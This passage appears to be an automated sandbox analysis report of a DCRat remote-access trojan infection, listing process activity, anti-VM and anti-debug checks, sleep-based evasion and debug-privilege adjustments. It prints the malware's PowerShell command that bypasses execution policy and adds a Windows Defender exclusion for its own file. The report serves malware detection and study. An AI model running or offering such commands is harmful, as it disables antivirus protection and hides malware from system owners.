              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Process information set: NOOPENFILEERRORBOX (60 occurrences)
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Process information set: NOOPENFILEERRORBOX (66 occurrences)
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (10 occurrences)
              Source: C:\Users\user\Desktop\cougif6lqM.exe Memory allocated: 14D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\cougif6lqM.exe Memory allocated: 1B160000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Memory allocated: 1420000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Memory allocated: 1B270000 memory reserve | memory write watch
              Source: C:\Componenthost\providerreviewdhcp.exe Memory allocated: 2960000 memory reserve | memory write watch
              Source: C:\Componenthost\providerreviewdhcp.exe Memory allocated: 1ABE0000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exe Memory allocated: 750000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exe Memory allocated: 1A480000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exe Memory allocated: 13B0000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exe Memory allocated: 1B110000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Memory allocated: EA0000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Memory allocated: 1ABF0000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Memory allocated: 13B0000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Memory allocated: 1AD90000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Memory allocated: B40000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Memory allocated: 1A770000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Memory allocated: 1750000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Memory allocated: 1B370000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\cougif6lqM.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Thread delayed: delay time: 922337203685477
              Source: C:\Componenthost\providerreviewdhcp.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Window / User API: threadDelayed 7407
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Window / User API: threadDelayed 2445
              Source: C:\Componenthost\providerreviewdhcp.exe Window / User API: threadDelayed 804
              Source: C:\Componenthost\providerreviewdhcp.exe Window / User API: threadDelayed 1451
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9255
              Source: C:\Users\user\cmd.exe Window / User API: threadDelayed 363
              Source: C:\Users\user\cmd.exe Window / User API: threadDelayed 364
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Window / User API: threadDelayed 361
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Window / User API: threadDelayed 367
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Window / User API: threadDelayed 366
              Source: C:\Users\user\Desktop\cougif6lqM.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe TID: 4316 Thread sleep time: -33204139332677172s >= -30000s
              Source: C:\Componenthost\providerreviewdhcp.exe TID: 7600 Thread sleep count: 804 > 30
              Source: C:\Componenthost\providerreviewdhcp.exe TID: 7600 Thread sleep count: 1451 > 30
              Source: C:\Componenthost\providerreviewdhcp.exe TID: 7572 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\cmd.exe TID: 7372 Thread sleep count: 363 > 30
              Source: C:\Users\user\cmd.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\cmd.exe TID: 7464 Thread sleep count: 364 > 30
              Source: C:\Users\user\cmd.exe TID: 7852 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 6816 Thread sleep count: 361 > 30
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 7324 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 2376 Thread sleep count: 367 > 30
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 1544 Thread sleep count: 366 > 30
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 8076 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 2624 Thread sleep count: 337 > 30
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 1876 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe File Volume queried: C:\ FullSizeInformation (11 occurrences)
              Source: C:\Componenthost\providerreviewdhcp.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\cmd.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\cmd.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F2AAA8 FindFirstFileExA
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F1DD72 VirtualQuery,GetSystemInfo
              Source: C:\Users\user\Desktop\cougif6lqM.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Thread delayed: delay time: 922337203685477
              Source: C:\Componenthost\providerreviewdhcp.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Thread delayed: delay time: 922337203685477
              Source: DCRatBuild.exe, 00000003.00000003.1332983655.0000000003080000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000004.00000003.1337275179.0000000000778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
              Source: javaclient.exe, 00000002.00000002.3771177110.000000001BFD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe API call chain: ExitProcess graph end node (graph_3-24384)
              Source: C:\Componenthost\providerreviewdhcp.exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F2753D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F2B710 GetProcessHeap
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Process token adjusted: Debug
              Source: C:\Componenthost\providerreviewdhcp.exe Process token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\cmd.exe Process token adjusted: Debug
              Source: C:\Users\user\cmd.exe Process token adjusted: Debug
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Process token adjusted: Debug
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F1F063 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F1F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 3_2_00F1EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\cougif6lqM.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
